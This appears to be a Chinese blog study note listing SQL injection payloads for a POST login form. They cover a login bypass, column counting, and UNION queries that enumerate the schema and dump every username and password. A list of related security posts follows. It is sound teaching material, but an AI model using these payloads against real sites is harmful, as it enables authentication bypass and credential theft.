web渗透—— SQL基于GET POST注入

原创 2018年04月16日 20:23:42

0x00 前言

之前我们学习了这些知识。

这里写图片描述

0x01 小知识

1.万能登录

1' or 1=1 #

2. 判断字段数

uname=123' order by 2 # &passwd=&submit=Submit

3. 联合查询

uname=123' union select  1,2 # &passwd=&submit=Submit

4.查询数据库具体信息

uname=123' union select  version(),database() # &passwd=&submit=Submit

这里写图片描述

5. 查询当前数据库的所有表

uname=123' union select 1, group_concat(table_name)from information_schema.tables where table_schema=database() # &passwd=&submit=Submit

6.查看表中的字段名

uname=123' union select 1, group_concat(column_name)from information_schema.columns where table_name='users' # &passwd=&submit=Submit

7.输出所有的用户名和密码

uname=123' union select group_concat(username), group_concat(password) from users# &passwd=&submit=Submit
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_36869808/article/details/79965880

Microsoft .NET 中的基类继承

Microsoft .NET 中的基类继承 升级到 Microsoft .NET Paul D. SheriffPDSA, Inc. 2001 年 12 月 摘要:本文介绍了继承,说明了如何继承基类,...
  • sonicdater
  • sonicdater
  • 2002-02-16 23:34:00
  • 641

某站登入框存在post注入

验证方法,在账号密码处输入' 如果报错说明有该漏洞存在。用burp抓包,具体怎么做,之前博客里有: http://blog.csdn.net/qq_36512966/article/details/7...
  • qq_36512966
  • qq_36512966
  • 2017-09-29 11:13:36
  • 99

渗透攻防Web篇-SQL注入攻击初级

前言 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞...
  • supernewer1995
  • supernewer1995
  • 2016-09-21 21:07:38
  • 781

sql注入之GET/POST注入

针对不同数据库,语句有所不同,但是思路大致相同 第一步判断网站是否存在注入, 如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是...
  • qq_38135094
  • qq_38135094
  • 2017-04-02 00:18:30
  • 3501

渗透攻防Web篇-SQL注入攻击初级 1

Preface不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,...
  • ZmeiXuan
  • ZmeiXuan
  • 2017-08-03 23:28:11
  • 421

SQL注入测试工具:Pangolin(穿山甲)

第一章、简介   1.1 Pangolin是什么? Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。 所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控...
  • yefan2222
  • yefan2222
  • 2011-12-20 12:51:11
  • 35243

防止GET和POST方式引起的SQL注入攻击ASP程序

编写通用的SQL防注入程序一般的http请求不外乎get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否...
  • icecoldheart
  • icecoldheart
  • 2008-01-11 09:17:00
  • 3522

【安全牛学习笔记】手动漏洞挖掘-SQL注入

​root@kali:~# john --format=raw-MD5 dvwa.txt root@kali:~# cd .john/ root@kali:~/.john# ls john.lo...
  • edu_aqniu
  • edu_aqniu
  • 2017-09-28 12:02:00
  • 175

防止通过POST和GET方法SQL注入的两个最彻底过滤程序

出处http://www.myhack58.com/Article/html/3/68/2011/31262.htm 先针对POST递交上来的信息过滤程序 Public Function ...
  • jazywoo123
  • jazywoo123
  • 2011-12-13 23:20:31
  • 728

Web安全渗透自学

Web 应用程序(Web Applications)是指通过 Web 浏览器访问的任何应用程序。它基于 Web 运行,是典型的浏览器--服务器架构的产物。...
  • CHS007chs
  • CHS007chs
  • 2014-08-14 09:17:44
  • 2032
收藏助手
不良信息举报
您举报文章:web渗透—— SQL基于GET POST注入
举报原因:
原因补充:

(最多只允许输入30个字)